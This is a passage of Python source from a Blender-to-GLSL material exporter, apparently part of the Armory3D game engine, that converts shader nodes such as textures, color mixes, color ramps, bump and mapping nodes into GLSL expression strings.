grad = node.gradient_type
if grad == 'LINEAR':
f = '{0}.x'.format(co)
elif grad == 'QUADRATIC':
f = '0.0'
elif grad == 'EASING':
f = '0.0'
elif grad == 'DIAGONAL':
f = '({0}.x + {0}.y) * 0.5'.format(co)
elif grad == 'RADIAL':
f = 'atan({0}.y, {0}.x) / PI2 + 0.5'.format(co)
elif grad == 'QUADRATIC_SPHERE':
f = '0.0'
elif grad == 'SPHERICAL':
f = 'max(1.0 - sqrt({0}.x * {0}.x + {0}.y * {0}.y + {0}.z * {0}.z), 0.0)'.format(co)
res = 'vec3(clamp({0}, 0.0, 1.0))'.format(f)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_IMAGE':
# Already fetched
if is_parsed(store_var_name(node)):
return '{0}.rgb'.format(store_var_name(node))
tex_name = node_name(node.name)
tex = make_texture(node, tex_name)
tex_link = node.name if node.arm_material_param else None
if tex != None:
curshader.write_textures += 1
to_linear = node.image != None and node.image.colorspace_settings.name == 'sRGB'
res = '{0}.rgb'.format(texture_store(node, tex, tex_name, to_linear, tex_link=tex_link))
curshader.write_textures -= 1
return res
elif node.image == None: # Empty texture
tex = {}
tex['name'] = tex_name
tex['file'] = ''
return '{0}.rgb'.format(texture_store(node, tex, tex_name, to_linear=False, tex_link=tex_link))
else:
global parsed
tex_store = store_var_name(node) # Pink color for missing texture
parsed[tex_store] = True
curshader.write_textures += 1
curshader.write('vec4 {0} = vec4(1.0, 0.0, 1.0, 1.0);'.format(tex_store))
curshader.write_textures -= 1
return '{0}.rgb'.format(tex_store)
elif node.type == 'TEX_MAGIC':
curshader.add_function(c_functions.str_tex_magic)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
res = 'tex_magic({0} * {1} * 4.0)'.format(co, scale)
if sample_bump:
write_bump(node, res, 0.1)
return res
elif node.type == 'TEX_MUSGRAVE':
curshader.add_function(c_functions.str_tex_musgrave)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
# detail = parse_value_input(node.inputs[2])
# distortion = parse_value_input(node.inputs[3])
res = 'vec3(tex_musgrave_f({0} * {1} * 0.5))'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_NOISE':
curshader.add_function(c_functions.str_tex_noise)
assets_add(get_sdk_path() + '/armory/Assets/' + 'noise256.png')
assets_add_embedded_data('noise256.png')
curshader.add_uniform('sampler2D snoise256', link='$noise256.png')
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
# detail = parse_value_input(node.inputs[2])
# distortion = parse_value_input(node.inputs[3])
# Slow..
res = 'vec3(tex_noise({0} * {1}), tex_noise({0} * {1} + 0.33), tex_noise({0} * {1} + 0.66))'.format(co, scale)
if sample_bump:
write_bump(node, res, 0.1)
return res
elif node.type == 'TEX_POINTDENSITY':
# Pass through
return to_vec3([0.0, 0.0, 0.0])
elif node.type == 'TEX_SKY':
# Pass through
return to_vec3([0.0, 0.0, 0.0])
elif node.type == 'TEX_VORONOI':
curshader.add_function(c_functions.str_tex_voronoi)
assets_add(get_sdk_path() + '/armory/Assets/' + 'noise256.png')
assets_add_embedded_data('noise256.png')
curshader.add_uniform('sampler2D snoise256', link='$noise256.png')
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
if node.coloring == 'INTENSITY':
res = 'vec3(tex_voronoi({0} * {1}).a)'.format(co, scale)
else: # CELLS
res = 'tex_voronoi({0} * {1}).rgb'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_WAVE':
curshader.add_function(c_functions.str_tex_wave)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
res = 'vec3(tex_wave_f({0} * {1}))'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'BRIGHTCONTRAST':
out_col = parse_vector_input(node.inputs[0])
bright = parse_value_input(node.inputs[1])
contr = parse_value_input(node.inputs[2])
curshader.add_function(c_functions.str_brightcontrast)
return 'brightcontrast({0}, {1}, {2})'.format(out_col, bright, contr)
elif node.type == 'GAMMA':
out_col = parse_vector_input(node.inputs[0])
gamma = parse_value_input(node.inputs[1])
return 'pow({0}, vec3({1}))'.format(out_col, gamma)
elif node.type == 'HUE_SAT':
curshader.add_function(c_functions.str_hue_sat)
hue = parse_value_input(node.inputs[0])
sat = parse_value_input(node.inputs[1])
val = parse_value_input(node.inputs[2])
fac = parse_value_input(node.inputs[3])
col = parse_vector_input(node.inputs[4])
return 'hue_sat({0}, vec4({1}-0.5, {2}, {3}, 1.0-{4}))'.format(col, hue, sat, val, fac)
elif node.type == 'INVERT':
fac = parse_value_input(node.inputs[0])
out_col = parse_vector_input(node.inputs[1])
return 'mix({0}, vec3(1.0) - ({0}), {1})'.format(out_col, fac)
elif node.type == 'MIX_RGB':
fac = parse_value_input(node.inputs[0])
fac_var = node_name(node.name) + '_fac'
curshader.write('float {0} = {1};'.format(fac_var, fac))
col1 = parse_vector_input(node.inputs[1])
col2 = parse_vector_input(node.inputs[2])
blend = node.blend_type
if blend == 'MIX':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var)
elif blend == 'ADD':
out_col = 'mix({0}, {0} + {1}, {2})'.format(col1, col2, fac_var)
elif blend == 'MULTIPLY':
out_col = 'mix({0}, {0} * {1}, {2})'.format(col1, col2, fac_var)
elif blend == 'SUBTRACT':
out_col = 'mix({0}, {0} - {1}, {2})'.format(col1, col2, fac_var)
elif blend == 'SCREEN':
out_col = '(vec3(1.0) - (vec3(1.0 - {2}) + {2} * (vec3(1.0) - {1})) * (vec3(1.0) - {0}))'.format(col1, col2, fac_var)
elif blend == 'DIVIDE':
out_col = '(vec3((1.0 - {2}) * {0} + {2} * {0} / {1}))'.format(col1, col2, fac_var)
elif blend == 'DIFFERENCE':
out_col = 'mix({0}, abs({0} - {1}), {2})'.format(col1, col2, fac_var)
elif blend == 'DARKEN':
out_col = 'min({0}, {1} * {2})'.format(col1, col2, fac_var)
elif blend == 'LIGHTEN':
out_col = 'max({0}, {1} * {2})'.format(col1, col2, fac_var)
elif blend == 'OVERLAY':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
elif blend == 'DODGE':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
elif blend == 'BURN':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
elif blend == 'HUE':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
elif blend == 'SATURATION':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
elif blend == 'VALUE':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
elif blend == 'COLOR':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
elif blend == 'SOFT_LIGHT':
out_col = '((1.0 - {2}) * {0} + {2} * ((vec3(1.0) - {0}) * {1} * {0} + {0} * (vec3(1.0) - (vec3(1.0) - {1}) * (vec3(1.0) - {0}))));'.format(col1, col2, fac)
elif blend == 'LINEAR_LIGHT':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
# out_col = '({0} + {2} * (2.0 * ({1} - vec3(0.5))))'.format(col1, col2, fac_var)
if node.use_clamp:
return 'clamp({0}, vec3(0.0), vec3(1.0))'.format(out_col)
else:
return out_col
elif node.type == 'BLACKBODY':
t = float(parse_value_input(node.inputs[0]))
rgb = [0,0,0]
blackbody_table_r = [
[2.52432244e+03, -1.06185848e-03, 3.11067539e+00],
[3.37763626e+03, -4.34581697e-04, 1.64843306e+00],
[4.10671449e+03, -8.61949938e-05, 6.41423749e-01],
[4.66849800e+03, 2.85655028e-05, 1.29075375e-01],
[4.60124770e+03, 2.89727618e-05, 1.48001316e-01],
[3.78765709e+03, 9.36026367e-06, 3.98995841e-01]
]
blackbody_table_g = [
[-7.50343014e+02, 3.15679613e-04, 4.73464526e-01],
[-1.00402363e+03, 1.29189794e-04, 9.08181524e-01],
[-1.22075471e+03, 2.56245413e-05, 1.20753416e+00],
[-1.42546105e+03, -4.01730887e-05, 1.44002695e+00],
[-1.18134453e+03, -2.18913373e-05, 1.30656109e+00],
[-5.00279505e+02, -4.59745390e-06, 1.09090465e+00]
]
blackbody_table_b = [
[0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0],
[-2.02524603e-11, 1.79435860e-07, -2.60561875e-04, -1.41761141e-02],
[-2.22463426e-13, -1.55078698e-08, 3.81675160e-04, -7.30646033e-01],
[6.72595954e-13, -2.73059993e-08, 4.24068546e-04, -7.52204323e-01]
]
if (t >= 12000):
rgb[0] = 0.826270103
rgb[1] = 0.994478524
rgb[2] = 1.56626022
elif (t < 965.0):
rgb[0] = 4.70366907
rgb[1] = 0.0
rgb[2] = 0.0
else:
if (t >= 6365.0):
i = 5
elif(t >= 3315.0):
i = 4
elif(t >= 1902.0):
i = 3
elif(t >= 1449.0):
i = 2
elif(t >= 1167.0):
i = 1
else:
i = 0
r = blackbody_table_r[i]
g = blackbody_table_g[i]
b = blackbody_table_b[i]
t_inv = 1.0 / t
rgb[0] = r[0] * t_inv + r[1] * t + r[2]
rgb[1] = g[0] * t_inv + g[1] * t + g[2]
rgb[2] = ((b[0] * t + b[1]) * t + b[2]) * t + b[3]
# Pass constant
return to_vec3([rgb[0], rgb[1], rgb[2]])
elif node.type == 'VALTORGB': # ColorRamp
fac = parse_value_input(node.inputs[0])
interp = node.color_ramp.interpolation
elems = node.color_ramp.elements
if len(elems) == 1:
return to_vec3(elems[0].color)
# Write cols array
cols_var = node_name(node.name) + '_cols'
curshader.write('vec3 {0}[{1}];'.format(cols_var, len(elems))) # TODO: Make const
for i in range(0, len(elems)):
curshader.write('{0}[{1}] = vec3({2}, {3}, {4});'.format(cols_var, i, elems[i].color[0], elems[i].color[1], elems[i].color[2]))
# Get index
fac_var = node_name(node.name) + '_fac'
curshader.write('float {0} = {1};'.format(fac_var, fac))
index = '0'
for i in range(1, len(elems)):
index += ' + ({0} > {1} ? 1 : 0)'.format(fac_var, elems[i].position)
# Write index
index_var = node_name(node.name) + '_i'
curshader.write('int {0} = {1};'.format(index_var, index))
if interp == 'CONSTANT':
return '{0}[{1}]'.format(cols_var, index_var)
else: # Linear
# Write facs array
facs_var = node_name(node.name) + '_facs'
curshader.write('float {0}[{1}];'.format(facs_var, len(elems))) # TODO: Make const
for i in range(0, len(elems)):
curshader.write('{0}[{1}] = {2};'.format(facs_var, i, elems[i].position))
# Mix color
# float f = (pos - start) * (1.0 / (finish - start))
return 'mix({0}[{1}], {0}[{1} + 1], ({2} - {3}[{1}]) * (1.0 / ({3}[{1} + 1] - {3}[{1}]) ))'.format(cols_var, index_var, fac_var, facs_var)
elif node.type == 'CURVE_VEC': # Vector Curves
fac = parse_value_input(node.inputs[0])
vec = parse_vector_input(node.inputs[1])
curves = node.mapping.curves
name = node_name(node.name)
# mapping.curves[0].points[0].handle_type # bezier curve
return '(vec3({0}, {1}, {2}) * {3})'.format(\
vector_curve(name + '0', vec + '.x', curves[0].points), vector_curve(name + '1', vec + '.y', curves[1].points), vector_curve(name + '2', vec + '.z', curves[2].points), fac)
elif node.type == 'CURVE_RGB': # RGB Curves
fac = parse_value_input(node.inputs[0])
vec = parse_vector_input(node.inputs[1])
curves = node.mapping.curves
name = node_name(node.name)
# mapping.curves[0].points[0].handle_type
return '(sqrt(vec3({0}, {1}, {2}) * vec3({4}, {5}, {6})) * {3})'.format(\
vector_curve(name + '0', vec + '.x', curves[0].points), vector_curve(name + '1', vec + '.y', curves[1].points), vector_curve(name + '2', vec + '.z', curves[2].points), fac,\
vector_curve(name + '3a', vec + '.x', curves[3].points), vector_curve(name + '3b', vec + '.y', curves[3].points), vector_curve(name + '3c', vec + '.z', curves[3].points))
elif node.type == 'COMBHSV':
curshader.add_function(c_functions.str_hue_sat)
h = parse_value_input(node.inputs[0])
s = parse_value_input(node.inputs[1])
v = parse_value_input(node.inputs[2])
return 'hsv_to_rgb(vec3({0}, {1}, {2}))'.format(h,s,v)
elif node.type == 'COMBRGB':
r = parse_value_input(node.inputs[0])
g = parse_value_input(node.inputs[1])
b = parse_value_input(node.inputs[2])
return 'vec3({0}, {1}, {2})'.format(r, g, b)
elif node.type == 'WAVELENGTH':
curshader.add_function(c_functions.str_wavelength_to_rgb)
wl = parse_value_input(node.inputs[0])
# Roughly map to cycles - 450 to 600 nanometers
return 'wavelength_to_rgb(({0} - 450.0) / 150.0)'.format(wl)
# Vector
elif node.type == 'CAMERA':
# View Vector in camera space
return 'vVecCam'
elif node.type == 'NEW_GEOMETRY':
if socket == node.outputs[0]: # Position
return 'wposition'
elif socket == node.outputs[1]: # Normal
return 'n' if curshader.shader_type == 'frag' else 'wnormal'
elif socket == node.outputs[2]: # Tangent
return 'wtangent'
elif socket == node.outputs[3]: # True Normal
return 'n' if curshader.shader_type == 'frag' else 'wnormal'
elif socket == node.outputs[4]: # Incoming
return 'vVec'
elif socket == node.outputs[5]: # Parametric
return 'mposition'
elif node.type == 'HAIR_INFO':
return 'vec3(0.0)' # Tangent Normal
elif node.type == 'OBJECT_INFO':
return 'wposition'
elif node.type == 'PARTICLE_INFO':
if socket == node.outputs[3]: # Location
particle_info['location'] = True
return 'p_location' if arm.utils.get_rp().arm_particles == 'On' else 'vec3(0.0)'
elif socket == node.outputs[5]: # Velocity
particle_info['velocity'] = True
return 'p_velocity' if arm.utils.get_rp().arm_particles == 'On' else 'vec3(0.0)'
elif socket == node.outputs[6]: # Angular Velocity
particle_info['angular_velocity'] = True
return 'vec3(0.0)'
elif node.type == 'TANGENT':
return 'wtangent'
elif node.type == 'TEX_COORD':
#obj = node.object
#instance = node.from_instance
if socket == node.outputs[0]: # Generated - bounds
return 'bposition'
elif socket == node.outputs[1]: # Normal
return 'n'
elif socket == node.outputs[2]: # UV
con.add_elem('tex', 'short2norm')
return 'vec3(texCoord.x, 1.0 - texCoord.y, 0.0)'
elif socket == node.outputs[3]: # Object
return 'mposition'
elif socket == node.outputs[4]: # Camera
return 'vec3(0.0)' # 'vposition'
elif socket == node.outputs[5]: # Window
return 'vec3(0.0)' # 'wvpposition'
elif socket == node.outputs[6]: # Reflection
return 'vec3(0.0)'
elif node.type == 'UVMAP':
#instance = node.from_instance
con.add_elem('tex', 'short2norm')
mat = mat_get_material()
mat_users = mat_get_material_users()
if mat_users != None and mat in mat_users:
mat_user = mat_users[mat][0]
if hasattr(mat_user.data, 'uv_layers'):
lays = mat_user.data.uv_layers
# Second uvmap referenced
if len(lays) > 1 and node.uv_map == lays[1].name:
con.add_elem('tex1', 'short2norm')
return 'vec3(texCoord1.x, 1.0 - texCoord1.y, 0.0)'
return 'vec3(texCoord.x, 1.0 - texCoord.y, 0.0)'
elif node.type == 'BUMP':
# Interpolation strength
strength = parse_value_input(node.inputs[0])
# Height multiplier
# distance = parse_value_input(node.inputs[1])
sample_bump = True
height = parse_value_input(node.inputs[2])
sample_bump = False
nor = parse_vector_input(node.inputs[3])
if sample_bump_res != '':
if node.invert:
ext = ['1', '2', '3', '4']
else:
ext = ['2', '1', '4', '3']
curshader.write('float {0}_fh1 = {0}_{1} - {0}_{2}; float {0}_fh2 = {0}_{3} - {0}_{4};'.format(sample_bump_res, ext[0], ext[1], ext[2], ext[3]))
curshader.write('{0}_fh1 *= ({1}) * 3.0; {0}_fh2 *= ({1}) * 3.0;'.format(sample_bump_res, strength))
curshader.write('vec3 {0}_a = normalize(vec3(2.0, 0.0, {0}_fh1));'.format(sample_bump_res))
curshader.write('vec3 {0}_b = normalize(vec3(0.0, 2.0, {0}_fh2));'.format(sample_bump_res))
res = 'normalize(mat3({0}_a, {0}_b, normalize(vec3({0}_fh1, {0}_fh2, 2.0))) * n)'.format(sample_bump_res)
sample_bump_res = ''
else:
res = 'n'
return res
elif node.type == 'MAPPING':
out = parse_vector_input(node.inputs[0])
scale = node.inputs['Scale'].default_value
rotation = node.inputs['Rotation'].default_value
location = node.inputs['Location'].default_value if node.inputs['Location'].enabled else [0.0, 0.0, 0.0]
if scale[0] != 1.0 or scale[1] != 1.0 or scale[2] != 1.0:
out = '({0} * vec3({1}, {2}, {3}))'.format(out, scale[0], scale[1], scale[2])
if rotation[2] != 0.0:
# ZYX rotation, Z axis for now..
a = rotation[2]
# x * cos(theta) - y * sin(theta)
# x * sin(theta) + y * cos(theta)
out = 'vec3({0}.x * {1} - ({0}.y) * {2}, {0}.x * {2} + ({0}.y) * {1}, 0.0)'.format(out, math.cos(a), math.sin(a))
# if node.rotation[1] != 0.0:
# a = node.rotation[1]
# out = 'vec3({0}.x * {1} - {0}.z * {2}, {0}.x * {2} + {0}.z * {1}, 0.0)'.format(out, math.cos(a), math.sin(a))
# if node.rotation[0] != 0.0:
# a = node.rotation[0]
# out = 'vec3({0}.y * {1} - {0}.z * {2}, {0}.y * {2} + {0}.z * {1}, 0.0)'.format(out, math.cos(a), math.sin(a))
if location[0] != 0.0 or location[1] != 0.0 or location[2] != 0.0:
out = '({0} + vec3({1}, {2}, {3}))'.format(out, location[0], location[1], location[2])
# use Extension parameter from the Texture node instead
# if node.use_min:
# out = 'max({0}, vec3({1}, {2}, {3}))'.format(out, node.min[0], node.min[1])
# if node.use_max:
# out = 'min({0}, vec3({1}, {2}, {3}))'.format(out, node.max[0], node.max[1])
return out
elif node.type == 'NORMAL':
if socket == node.outputs[0]:
return to_vec3(node.outputs[0].default_value)
elif socket == node.outputs[1]: # TODO: is parse_value path preferred?
nor = parse_vector_input(node.inputs[0])
return 'vec3(dot({0}, {1}))'.format(to_vec3(node.outputs[0].default_value), nor)
elif node.type == 'NORMAL_MAP':
if curshader == tese:
return parse_vector_input(node.inputs[1])
else:
#space = node.space
#map = node.uv_map
# Color
parse_normal_map_color_input(node.inputs[1], node.inputs[0])
return None
elif node.type == 'VECT_TRANSFORM':
#type = node.vector_type
#conv_from = node.convert_from
#conv_to = node.convert_to
# Pass through
return parse_vector_input(node.inputs[0])
elif node.type == 'COMBXYZ':
x = parse_value_input(node.inputs[0])
y = parse_value_input(node.inputs[1])
z = parse_value_input(node.inputs[2])
return 'vec3({0}, {1}, {2})'.format(x, y, z)
elif node.type == 'VECT_MATH':
vec1 = parse_vector_input(node.inputs[0])
vec2 = parse_vector_input(node.inputs[1])
op = node.operation
if op == 'ADD':
return '({0} + {1})'.format(vec1, vec2)
elif op == 'SUBTRACT':
return '({0} - {1})'.format(vec1, vec2)
elif op == 'AVERAGE':
return '(({0} + {1}) / 2.0)'.format(vec1, vec2)
elif op == 'DOT_PRODUCT':
return 'vec3(dot({0}, {1}))'.format(vec1, vec2)
elif op == 'CROSS_PRODUCT':
return 'cross({0}, {1})'.format(vec1, vec2)
elif op == 'NORMALIZE':
return 'normalize({0})'.format(vec1)
elif node.type == 'DISPLACEMENT':
height = parse_value_input(node.inputs[0])
midlevel = parse_value_input(node.inputs[1])
scale = parse_value_input(node.inputs[2])
nor = parse_vector_input(node.inputs[3])
return '(vec3({0}) * {1})'.format(height, scale)
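# Bump mapping protocol: the BUMP branch above sets the global 'sample_bump' flag before
# parsing its height input so that texture branches call write_bump() (defined elsewhere
# in this module) to emit neighbouring height samples under 'sample_bump_res'; the BUMP
# branch then reconstructs a perturbed normal from the finite differences of those samples.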
def parse_normal_map_color_input(inp, strength_input=None):
global normal_parsed
global frag
if basecol_only:
return
if inp.is_linked == False:
return
if normal_parsed:
return
normal_parsed = True
frag.write_normal += 1
if not get_arm_export_tangents() or mat_get_material().arm_decal: # Compute TBN matrix
frag.write('vec3 texn = ({0}) * 2.0 - 1.0;'.format(parse_vector_input(inp)))
frag.write('texn.y = -texn.y;')
frag.add_include('std/normals.glsl')
frag.write('mat3 TBN = cotangentFrame(n, -vVec, texCoord);')
frag.write('n = TBN * normalize(texn);')
else:
frag.write('vec3 n = ({0}) * 2.0 - 1.0;'.format(parse_vector_input(inp)))
if strength_input != None:
strength = parse_value_input(strength_input)
if strength != '1.0':
frag.write('n.xy *= {0};'.format(strength))
frag.write('n = normalize(TBN * n);')
con.add_elem('tang', 'short4norm')
frag.write_normal -= 1
def parse_value_input(inp):
if inp.is_linked:
l = inp.links[0]
if l.from_node.type == 'REROUTE':
return parse_value_input(l.from_node.inputs[0])
res_var = write_result(l)
st = l.from_socket.type
if st == 'RGB' or st == 'RGBA' or st == 'VECTOR':
return '{0}.x'.format(res_var)
else: # VALUE
return res_var
else:
if mat_batch() and inp.is_uniform:
return to_uniform(inp)
else:
return to_vec1(inp.default_value)
def parse_value(node, socket):
global particle_info
global sample_bump
if node.type == 'GROUP':
if node.node_tree.name.startswith('Armory PBR'):
# Displacement
if socket == node.outputs[1]:
return parse_value_input(node.inputs[7])
else:
return None
else:
return parse_group(node, socket)
elif node.type == 'GROUP_INPUT':
return parse_group_input(node, socket)
elif node.type == 'ATTRIBUTE':
# Pass time till drivers are implemented
if node.attribute_name == 'time':
curshader.add_uniform('float time', link='_time')
return 'time'
else:
return '0.0'
elif node.type == 'CAMERA':
# View Z Depth
if socket == node.outputs[1]:
curshader.add_include('std/math.glsl')
curshader.add_uniform('vec2 cameraProj', link='_cameraPlaneProj')
return 'linearize(gl_FragCoord.z, cameraProj)'
# View Distance
else:
curshader.add_uniform('vec3 eye', link='_cameraPosition')
return 'distance(eye, wposition)'
elif node.type == 'FRESNEL':
curshader.add_function(c_functions.str_fresnel)
ior = parse_value_input(node.inputs[0])
if node.inputs[1].is_linked:
dotnv = 'dot({0}, vVec)'.format(parse_vector_input(node.inputs[1]))
else:
dotnv = 'dotNV'
return 'fresnel({0}, {1})'.format(ior, dotnv)
elif node.type == 'NEW_GEOMETRY':
if socket == node.outputs[6]: # Backfacing
return '(1.0 - float(gl_FrontFacing))'
elif socket == node.outputs[7]: # Pointiness
return '0.0'
elif node.type == 'HAIR_INFO':
# Is Strand
# Intercept
# Thickness
return '0.5'
elif node.type == 'LAYER_WEIGHT':
blend = parse_value_input(node.inputs[0])
if node.inputs[1].is_linked:
dotnv = 'dot({0}, vVec)'.format(parse_vector_input(node.inputs[1]))
else:
dotnv = 'dotNV'
if socket == node.outputs[0]: # Fresnel
curshader.add_function(c_functions.str_fresnel)
return 'fresnel(1.0 / (1.0 - {0}), {1})'.format(blend, dotnv)
elif socket == node.outputs[1]: # Facing
return '(1.0 - pow({0}, ({1} < 0.5) ? 2.0 * {1} : 0.5 / (1.0 - {1})))'.format(dotnv, blend)
elif node.type == 'LIGHT_PATH':
if socket == node.outputs[0]: # Is Camera Ray
return '1.0'
elif socket == node.outputs[1]: # Is Shadow Ray
return '0.0'
elif socket == node.outputs[2]: # Is Diffuse Ray
return '1.0'
elif socket == node.outputs[3]: # Is Glossy Ray
return '1.0'
elif socket == node.outputs[4]: # Is Singular Ray
return '0.0'
elif socket == node.outputs[5]: # Is Reflection Ray
return '0.0'
elif socket == node.outputs[6]: # Is Transmission Ray
return '0.0'
elif socket == node.outputs[7]: # Ray Length
return '0.0'
elif socket == node.outputs[8]: # Ray Depth
return '0.0'
elif socket == node.outputs[9]: # Transparent Depth
return '0.0'
elif socket == node.outputs[10]: # Transmission Depth
return '0.0'
elif node.type == 'OBJECT_INFO':
if socket == node.outputs[2]: # Object Index
curshader.add_uniform('float objectInfoIndex', link='_objectInfoIndex')
return 'objectInfoIndex'
elif socket == node.outputs[3]: # Material Index
curshader.add_uniform('float objectInfoMaterialIndex', link='_objectInfoMaterialIndex')
return 'objectInfoMaterialIndex'
elif socket == node.outputs[4]: # Random
curshader.add_uniform('float objectInfoRandom', link='_objectInfoRandom')
return 'objectInfoRandom'
elif node.type == 'PARTICLE_INFO':
if socket == node.outputs[0]: # Index
particle_info['index'] = True
return 'p_index' if arm.utils.get_rp().arm_particles == 'On' else '0.0'
elif socket == node.outputs[1]: # Age
particle_info['age'] = True
return 'p_age' if arm.utils.get_rp().arm_particles == 'On' else '0.0'
elif socket == node.outputs[2]: # Lifetime
particle_info['lifetime'] = True
return 'p_lifetime' if arm.utils.get_rp().arm_particles == 'On' else '0.0'
elif socket == node.outputs[4]: # Size
particle_info['size'] = True
return '1.0'
elif node.type == 'VALUE':
if node.arm_material_param:
nn = 'param_' + node_name(node.name)
curshader.add_uniform('float {0}'.format(nn), link='{0}'.format(node.name))
return nn
else:
return to_vec1(node.outputs[0].default_value)
elif node.type == 'WIREFRAME':
#node.use_pixel_size
# size = parse_value_input(node.inputs[0])
return '0.0'
elif node.type == 'TEX_BRICK':
curshader.add_function(c_functions.str_tex_brick)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[4])
res = 'tex_brick_f({0} * {1})'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_CHECKER':
curshader.add_function(c_functions.str_tex_checker)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[3])
res = 'tex_checker_f({0}, {1})'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_GRADIENT':
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
grad = node.gradient_type
if grad == 'LINEAR':
f = '{0}.x'.format(co)
elif grad == 'QUADRATIC':
f = '0.0'
elif grad == 'EASING':
f = '0.0'
elif grad == 'DIAGONAL':
f = '({0}.x + {0}.y) * 0.5'.format(co)
elif grad == 'RADIAL':
f = 'atan({0}.y, {0}.x) / PI2 + 0.5'.format(co)
elif grad == 'QUADRATIC_SPHERE':
f = '0.0'
elif grad == 'SPHERICAL':
f = 'max(1.0 - sqrt({0}.x * {0}.x + {0}.y * {0}.y + {0}.z * {0}.z), 0.0)'.format(co)
res = '(clamp({0}, 0.0, 1.0))'.format(f)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_IMAGE':
# Already fetched
if is_parsed(store_var_name(node)):
return '{0}.a'.format(store_var_name(node))
tex_name = safesrc(node.name)
tex = make_texture(node, tex_name)
tex_link = node.name if node.arm_material_param else None
if tex != None:
curshader.write_textures += 1
res = '{0}.a'.format(texture_store(node, tex, tex_name, tex_link=tex_link))
curshader.write_textures -= 1
return res
elif node.image == None: # Empty texture
tex = {}
tex['name'] = tex_name
tex['file'] = ''
return '{0}.a'.format(texture_store(node, tex, tex_name, True, tex_link=tex_link))
else:
tex_store = store_var_name(node) # Pink color for missing texture
curshader.write('vec4 {0} = vec4(1.0, 0.0, 1.0, 1.0);'.format(tex_store))
return '{0}.a'.format(tex_store)
elif node.type == 'TEX_MAGIC':
curshader.add_function(c_functions.str_tex_magic)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
res = 'tex_magic_f({0} * {1} * 4.0)'.format(co, scale)
if sample_bump:
write_bump(node, res, 0.1)
return res
elif node.type == 'TEX_MUSGRAVE':
# Fall back to noise
curshader.add_function(c_functions.str_tex_musgrave)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
# detail = parse_value_input(node.inputs[2])
# distortion = parse_value_input(node.inputs[3])
res = 'tex_musgrave_f({0} * {1} * 0.5)'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_NOISE':
curshader.add_function(c_functions.str_tex_noise)
assets_add(get_sdk_path() + '/armory/Assets/' + 'noise256.png')
assets_add_embedded_data('noise256.png')
curshader.add_uniform('sampler2D snoise256', link='$noise256.png')
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
# detail = parse_value_input(node.inputs[2])
# distortion = parse_value_input(node.inputs[3])
res = 'tex_noise({0} * {1})'.format(co, scale)
if sample_bump:
write_bump(node, res, 0.1)
return res
elif node.type == 'TEX_POINTDENSITY':
return '0.0'
elif node.type == 'TEX_VORONOI':
curshader.add_function(c_functions.str_tex_voronoi)
assets_add(get_sdk_path() + '/armory/Assets/' + 'noise256.png')
assets_add_embedded_data('noise256.png')
curshader.add_uniform('sampler2D snoise256', link='$noise256.png')
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
if node.coloring == 'INTENSITY':
res = 'tex_voronoi({0} * {1}).a'.format(co, scale)
else: # CELLS
res = 'tex_voronoi({0} * {1}).r'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_WAVE':
curshader.add_function(c_functions.str_tex_wave)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
res = 'tex_wave_f({0} * {1})'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'LIGHT_FALLOFF':
# Constant, linear, quadratic
# Shaders default to quadratic for now
return '1.0'
elif node.type == 'NORMAL':
nor = parse_vector_input(node.inputs[0])
return 'dot({0}, {1})'.format(to_vec3(node.outputs[0].default_value), nor)
elif node.type == 'VALTORGB': # ColorRamp
return '1.0'
elif node.type == 'MATH':
val1 = parse_value_input(node.inputs[0])
val2 = parse_value_input(node.inputs[1])
op = node.operation
if op == 'ADD':
out_val = '({0} + {1})'.format(val1, val2)
elif op == 'SUBTRACT':
